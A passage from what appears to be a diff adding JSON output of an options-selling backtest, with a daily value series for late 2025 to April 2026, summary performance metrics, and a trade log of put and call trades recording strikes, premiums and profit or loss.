+ ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.9929809570312 + ], + [ + "2025-09-17", + 587.8173217773438 + ], + [ + "2025-09-18", + 593.11767578125 + ], + [ + "2025-09-19", + 597.1326904296875 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.88427734375 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4783935546875 + ], + [ + "2025-10-15", + 600.6876220703125 + ], + [ + "2025-10-16", + 598.4633178710938 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.98388671875 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4693603515625 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.6743774414062 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.792724609375 + ], + [ + "2025-11-19", + 598.3436889648438 + ], + [ + "2025-11-20", + 584.1798095703125 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3406982421875 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.6743774414062 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4173583984375 + ], + [ + "2025-12-03", + 621.9335327148438 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915893554688 + ], + [ + "2025-12-09", + 623.4595947265625 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0587158203125 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601806640625 + ], + [ + "2025-12-19", + 615.4799194335938 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ], + "metrics": { + "total_return": 22.376311911285395, + "final_value": 12237.63119112854, + "cagr": 4.071794145596375, + "sharpe": 0.18207740240393414, + "max_dd": -12.670101265549032, + "n_trades": 167, + "wins": 139, + "losses": 28, + "win_rate": 83.23353293413174, + "avg_win": 39.6029966744192, + "avg_loss": -154.63291729042496, + "chain_quotes": 0, + "bs_quotes": 644 + }, + "trade_log": [ + { + "date": "2021-04-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 21.53, + "spot": 24.27460289001465, + "premium": 0.15583548330126096, + "close_cost": 0.0013175965141603296, + "pnl": 9.471788678710062, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2021-05-06 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.52, + "spot": 24.193418502807617, + "premium": 0.16538277610501684, + "close_cost": 0.06997910350015779, + "pnl": 3.5603672604859042, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-05-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 21.44, + "spot": 22.52910804748535, + "premium": 0.2048728189668081, + "close_cost": 0.025662706933038626, + "pnl": 11.941011203376945, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2021-05-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 20.73, + "spot": 23.417375564575195, + "premium": 0.2859142745403487, + "close_cost": 0.0492639407295552, + "pnl": 17.685033381079347, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-05-28 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.84, + "spot": 24.496671676635742, + "premium": 0.353402894070622, + "close_cost": 0.15268489637279536, + "pnl": 14.09179976978266, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-06-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.8, + "spot": 24.828577041625977, + "premium": 0.3496122706462437, + "close_cost": 0.10240690483339865, + "pnl": 18.740536581284502, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-06-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.57, + "spot": 25.87444496154785, + "premium": 0.27084203035877685, + "close_cost": 0.034165756847554185, + "pnl": 17.687627351122266, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-09-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.96, + "spot": 32.849273681640625, + "premium": 0.14406627886053336, + "close_cost": 0.015117308545511632, + "pnl": 6.914897031502171, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-04 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 31.06, + "spot": 28.424640655517578, + "premium": 0.12741045707574195, + "close_cost": 2.6353593444824206, + "pnl": -253.78488874066787, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-10-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 28.99, + "spot": 29.76420783996582, + "premium": 0.6224754915857851, + "close_cost": 0.7742078399658219, + "pnl": -18.16323483800368, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.98, + "spot": 30.151033401489258, + "premium": 0.328993695135388, + "close_cost": 0.15903912731368752, + "pnl": 11.015456782170048, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.37, + "spot": 34.002586364746094, + "premium": 0.37081426779889437, + "close_cost": 0.149875506878538, + "pnl": 16.113876092035635, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.66, + "spot": 35.07233810424805, + "premium": 0.38871639204830455, + "close_cost": 0.13603695024602835, + "pnl": 19.28794418022762, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-11-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.7, + "spot": 38.291114807128906, + "premium": 0.16040034889961508, + "close_cost": 0.061078341968788585, + "pnl": 3.9522006930826485, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-11-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.38, + "spot": 40.79117202758789, + "premium": 0.13996737518304947, + "close_cost": 0.0, + "pnl": 8.016737518304947, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-12-06 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.34, + "spot": 36.674564361572266, + "premium": 0.307400439930805, + "close_cost": 1.6654356384277378, + "pnl": -138.7935198496933, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-12-13 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 37.41, + "spot": 38.2696418762207, + "premium": 0.9146664056948524, + "close_cost": 0.8596418762207065, + "pnl": 2.512452947414582, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-12-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.97, + "spot": 39.587703704833984, + "premium": 0.6238178644723504, + "close_cost": 0.27060195194176195, + "pnl": 29.341591253058848, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-12-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.84, + "spot": 37.266746520996094, + "premium": 0.7326953725219969, + "close_cost": 0.26081434114122537, + "pnl": 41.20810313807715, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-01-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.92, + "spot": 40.862815856933594, + "premium": 0.9664354475146091, + "close_cost": 0.0, + "pnl": 90.6635447514609, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-01-10 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.41, + "spot": 34.52790832519531, + "premium": 0.7459474407784921, + "close_cost": 3.882091674804684, + "pnl": -316.6044234026192, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-01-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 35.22, + "spot": 31.84877586364746, + "premium": 1.1811480469235907, + "close_cost": 0.0, + "pnl": 112.13480469235905, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2022-01-20 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 32.49, + "spot": 29.551692962646484, + "premium": 1.0857040716949093, + "close_cost": 0.17374523286865617, + "pnl": 85.2158838826253, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-01-21 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 30.14, + "spot": 27.06357765197754, + "premium": 0.9261447656194512, + "close_cost": 0.1845473413777512, + "pnl": 68.17974242417, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-01-25 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 27.6, + "spot": 25.43031120300293, + "premium": 0.8934352492402251, + "close_cost": 0.08866988258488906, + "pnl": 74.4965366655336, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-02-01 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 25.94, + "spot": 30.091337203979492, + "premium": 0.7967881568573834, + "close_cost": 4.151337203979491, + "pnl": -338.44490471221076, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-02-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.29, + "spot": 28.329120635986328, + "premium": 0.8336827512703948, + "close_cost": 0.0, + "pnl": 77.38827512703948, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-02-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.63, + "spot": 30.086559295654297, + "premium": 0.8934033047757364, + "close_cost": 0.4022507502143897, + "pnl": 43.13525545613466, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-02-22 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 25.72, + "spot": 23.343353271484375, + "premium": 0.9722962480947945, + "close_cost": 2.376646728515624, + "pnl": -143.42504804208295, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-01 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.81, + "spot": 23.897327423095703, + "premium": 1.2690626452641443, + "close_cost": 0.0873274230957044, + "pnl": 112.19352221684399, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 24.38, + "spot": 20.40155601501465, + "premium": 1.2428168870769483, + "close_cost": 0.0003322279161910337, + "pnl": 118.26846591607573, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-03-14 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.81, + "spot": 19.035724639892578, + "premium": 1.056512135954378, + "close_cost": 0.0, + "pnl": 99.6712135954378, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-03-21 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 19.42, + "spot": 25.21063232421875, + "premium": 1.000416247728733, + "close_cost": 5.790632324218748, + "pnl": -482.0116076490015, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.7, + "spot": 27.230728149414062, + "premium": 0.9956691271693927, + "close_cost": 0.19335513684005123, + "pnl": 74.25139903293415, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-04-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.72, + "spot": 29.394092559814453, + "premium": 1.0369175679068654, + "close_cost": 0.0, + "pnl": 97.71175679068654, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-04-11 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 27.63, + "spot": 22.99950408935547, + "premium": 0.8649930519021414, + "close_cost": 4.63049591064453, + "pnl": -379.5402858742389, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-04-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.46, + "spot": 22.507614135742188, + "premium": 1.1031360613910923, + "close_cost": 0.0, + "pnl": 104.33360613910922, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-04-22 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 22.96, + "spot": 19.823701858520508, + "premium": 0.8969338883173066, + "close_cost": 0.025704292182083255, + "pnl": 81.14295961352232, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-04-26 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.22, + "spot": 18.247737884521484, + "premium": 0.8189177139434332, + "close_cost": 0.10424915567482573, + "pnl": 65.48685582686073, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 18.61, + "spot": 18.30982208251953, + "premium": 0.8275315207607665, + "close_cost": 0.0, + "pnl": 76.77315207607664, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-09 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 18.68, + "spot": 14.575267791748047, + "premium": 1.0004715984032329, + "close_cost": 0.00010121678925023667, + "pnl": 94.05703816139825, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-05-16 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.87, + "spot": 14.637351036071777, + "premium": 0.9919112993955066, + "close_cost": 0.0, + "pnl": 93.21112993955066, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-20 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.93, + "spot": 13.056612014770508, + "premium": 1.061477857267028, + "close_cost": 0.17573654538225147, + "pnl": 82.59413118847765, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-27 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.32, + "spot": 15.898124694824219, + "premium": 0.9972686806723319, + "close_cost": 2.5781246948242185, + "pnl": -161.07560141518866, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.94, + "spot": 16.667003631591797, + "premium": 0.8256466414204207, + "close_cost": 0.03843309745641155, + "pnl": 72.74135439640091, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-06-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.43, + "spot": 15.917224884033203, + "premium": 0.6981343490116458, + "close_cost": 0.17784893279181757, + "pnl": 46.04854162198282, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-06-17 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 12.03, + "spot": 10.826384544372559, + "premium": 0.5613366764115577, + "close_cost": 1.2036154556274408, + "pnl": -67.2178779215883, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-24 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 11.04, + "spot": 13.362252235412598, + "premium": 0.6866274796231897, + "close_cost": 2.3222522354125985, + "pnl": -166.55247557894089, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-01 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 12.56, + "spot": 11.647796630859375, + "premium": 0.6321776272516466, + "close_cost": 0.9122033691406255, + "pnl": -30.99257418889789, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-08 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 11.88, + "spot": 13.3192720413208, + "premium": 0.708480825844684, + "close_cost": 1.4392720413208, + "pnl": -76.0691215476116, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.52, + "spot": 12.793951988220215, + "premium": 0.5669064723350159, + "close_cost": 0.0, + "pnl": 50.71064723350159, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-07-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.03, + "spot": 13.591484069824219, + "premium": 0.37979551696620195, + "close_cost": 0.03423856844960038, + "pnl": 28.575694851660156, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-07-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.26, + "spot": 14.680333137512207, + "premium": 0.35997474866705037, + "close_cost": 0.027885858502483596, + "pnl": 27.22888901645668, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-08-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.98, + "spot": 17.020397186279297, + "premium": 0.3889090336973622, + "close_cost": 0.014972277044941085, + "pnl": 31.413675665242106, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-08-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 15.68, + "spot": 17.43110466003418, + "premium": 0.3862202726902675, + "close_cost": 0.1543147877711255, + "pnl": 17.2105484919142, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-08-24 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 16.74, + "spot": 15.621135711669922, + "premium": 0.41641631423561787, + "close_cost": 1.1188642883300766, + "pnl": -73.23479740944586, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-08-29 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 15.93, + "spot": 13.99741268157959, + "premium": 0.5312373659999707, + "close_cost": 0.011324325589380568, + "pnl": 46.01130404105902, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-09-02 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.28, + "spot": 12.741419792175293, + "premium": 0.5889763982857863, + "close_cost": 0.03251556484156848, + "pnl": 49.66608334442178, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-09-09 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.0, + "spot": 14.25052547454834, + "premium": 0.48822847349682164, + "close_cost": 1.2505254745483398, + "pnl": -79.21970010515182, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-09-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.4, + "spot": 14.771071434020996, + "premium": 0.3228255255555341, + "close_cost": 0.08620143406403646, + "pnl": 17.682409149149766, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-09-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.04, + "spot": 12.029850006103516, + "premium": 0.3694817907972925, + "close_cost": 0.16012302481664475, + "pnl": 14.955876598064773, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-09-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.57, + "spot": 10.047958374023438, + "premium": 0.29255483173446395, + "close_cost": 0.13631890675553926, + "pnl": 9.643592497892469, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-10-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.67, + "spot": 9.866482734680176, + "premium": 0.26542259640453203, + "close_cost": 0.06098804400291069, + "pnl": 14.463455240162133, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.75, + "spot": 9.221770286560059, + "premium": 0.3243665439300334, + "close_cost": 0.03489370975104489, + "pnl": 22.96728341789885, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-10-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 7.89, + "spot": 9.21699333190918, + "premium": 0.2476488970625792, + "close_cost": 0.0410416150599463, + "pnl": 14.680728200263289, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.23, + "spot": 10.157796859741211, + "premium": 0.3368323986117989, + "close_cost": 0.1334847960137926, + "pnl": 14.354760259800631, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-11-04 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 9.74, + "spot": 8.572281837463379, + "premium": 0.3787269441428016, + "close_cost": 1.1677181625366213, + "pnl": -81.88912183938196, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-11-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.74, + "spot": 10.826384544372559, + "premium": 0.45004108162632317, + "close_cost": 2.0863845443725584, + "pnl": -166.62434627462352, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-11-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 10.18, + "spot": 10.964879989624023, + "premium": 0.5100878837005149, + "close_cost": 0.2107241229802752, + "pnl": 23.956376072023975, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-11-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.8, + "spot": 10.539847373962402, + "premium": 0.4625412645918683, + "close_cost": 0.19892429268866874, + "pnl": 20.381697190319954, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-11-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.99, + "spot": 11.251418113708496, + "premium": 0.44017292006936604, + "close_cost": 0.05681933937403305, + "pnl": 32.355358069533295, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-12-09 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 10.51, + "spot": 9.976322174072266, + "premium": 0.4301961670505703, + "close_cost": 0.5336778259277342, + "pnl": -13.338165887716388, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-12-15 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.18, + "spot": 9.379364967346191, + "premium": 0.37559546754213624, + "close_cost": 0.007341691445240606, + "pnl": 30.84537760968956, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-12-19 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 9.57, + "spot": 8.725103378295898, + "premium": 0.3798960594277361, + "close_cost": 0.049846055242742215, + "pnl": 27.025000418499385, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-12-27 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 8.9, + "spot": 8.083925247192383, + "premium": 0.3626311845996204, + "close_cost": 0.0, + "pnl": 30.283118459962044, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2023-01-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 8.25, + "spot": 8.117527961730957, + "premium": 0.3426797547472238, + "close_cost": 0.0, + "pnl": 28.287975474722376, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2023-01-10 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.28, + "spot": 8.875999450683594, + "premium": 0.28144752943409257, + "close_cost": 0.5959994506835944, + "pnl": -34.44519212495018, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-02-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.28, + "spot": 11.97707748413086, + "premium": 0.285592287094095, + "close_cost": 0.08277220440874089, + "pnl": 14.302008268535413, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2023-02-22 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 11.76, + "spot": 10.738566398620605, + "premium": 0.2976773036967266, + "close_cost": 1.0214336013793943, + "pnl": -75.36562976826677, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-02-28 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.95, + "spot": 10.623353958129883, + "premium": 0.4503068353930404, + "close_cost": 0.0753674259177215, + "pnl": 31.51394094753189, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2023-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.84, + "spot": 10.887377738952637, + "premium": 0.4193265890313089, + "close_cost": 0.04737773895263686, + "pnl": 31.214885007867206, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2023-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 11.11, + "spot": 10.023299217224121, + "premium": 0.3368567342637183, + "close_cost": 0.024416412783867414, + "pnl": 25.26403214798509, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-03-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 10.22, + "spot": 11.794658660888672, + "premium": 0.28971152047022475, + "close_cost": 1.5746586608886712, + "pnl": -131.48471404184465, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-11-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.76, + "spot": 16.7550048828125, + "premium": 0.21085329133306585, + "close_cost": 0.024722739136189054, + "pnl": 12.63305521968768, + "hold_days": 2, + "result": "Win" + }, + { + "date": 